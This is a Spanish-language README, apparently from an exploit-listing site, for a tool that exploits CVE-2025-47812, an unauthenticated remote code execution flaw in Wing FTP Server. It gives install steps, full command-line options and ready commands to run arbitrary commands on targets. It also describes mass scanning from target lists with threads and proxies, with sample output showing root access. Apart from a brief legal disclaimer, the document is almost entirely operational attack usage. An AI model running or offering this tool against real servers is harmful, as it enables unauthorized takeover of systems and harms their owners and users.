Share
## https://sploitus.com/exploit?id=EE1D97CA-BB2C-5839-BEF4-FCC3DA54160F
# 🚀 Wing FTP Exploit - CVE-2025-47812

Exploit mejorado para Wing FTP Server CVE-2025-47812 - Unauthenticated Remote Code Execution (RCE)

## 🔧 Instalación

Clona este repositorio y entra en el directorio:

```bash
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt
```

O simplemente descarga el script `CVE-2025-47812.py` y ejecútalo.

## 🚀 Uso

```
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]

Exploit para Wing FTP Server CVE-2025-47812 - versión mejorada

opciones:
  -h, --help            muestra este mensaje
  -u URL, --url URL     URL objetivo (ej. http://192.168.1.100:5466)
  -f FILE, --file FILE  archivo con lista de URLs (una por línea)
  -c COMMAND, --command COMMAND
                        comando a ejecutar (por defecto: echo CVE-2025-47812)
  -U USERNAME, --username USERNAME
                        nombre de usuario (default: anonymous)
  -P PASSWORD, --password PASSWORD
                        contraseña (default: vacía)
  --check               modo verificación: solo comprueba si es vulnerable (usa comando inocuo)
  -v, --verbose         modo verbose (muestra detalles)
  --proxy PROXY         proxy (ej. http://127.0.0.1:8080)
  --timeout TIMEOUT     timeout en segundos (default: 10)
  -o OUTPUT, --output OUTPUT
                        archivo de salida para guardar resultados
  --output-format {txt,json,csv}
                        formato de salida (default: txt)
  --threads THREADS     número de hilos para escanear múltiples objetivos (default: 5)
  --no-progress         ocultar barra de progreso
```

## 🎯 Ejemplos básicos

### Probar un solo objetivo y ejecutar un comando:
```bash
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
```

### Modo verificación (solo detecta vulnerabilidad):
```bash
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
```

### Escanear múltiples objetivos desde un archivo:
```bash
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json
```

### Usar proxy y verbose:
```bash
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
```

## 📁 Estructura del archivo de targets

El archivo debe contener una URL por línea, por ejemplo:

```
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466
```

## 📊 Formatos de salida

### TXT
```
http://192.168.1.10:5466 - VULNERABLE - usuario: root
http://192.168.1.11:5466 - SEGURO - No vulnerable
```

### JSON
```json
[
  {
    "target": "http://192.168.1.10:5466",
    "vulnerable": true,
    "info": "usuario: root"
  }
]
```

### CSV
```
Target,Vulnerable,Info
http://192.168.1.10:5466,True,usuario: root
```

## ⚠️ Advertencia

Este exploit está diseñado únicamente para fines educativos y pruebas de seguridad autorizadas. El uso no autorizado de esta herramienta contra sistemas sin consentimiento explícito es ilegal y puede conllevar graves consecuencias legales. Los autores no se responsabilizan del mal uso que se le pueda dar.

## 🤝 Créditos

- Autor original: Sheikh Mohammad Hasan (4m3rr0r) – Descubrimiento y exploit base.
- Mejoras y refactorización: 0xJuarez – Añadidas funcionalidades de escaneo masivo, colores, soporte para proxies, múltiples formatos de salida, y mejoras de usabilidad.

Si te gusta este trabajo, ¡no olvides darle una estrella ⭐ en GitHub!

## 📄 Licencia

Este proyecto está licenciado bajo la MIT License – ver el archivo LICENSE para más detalles.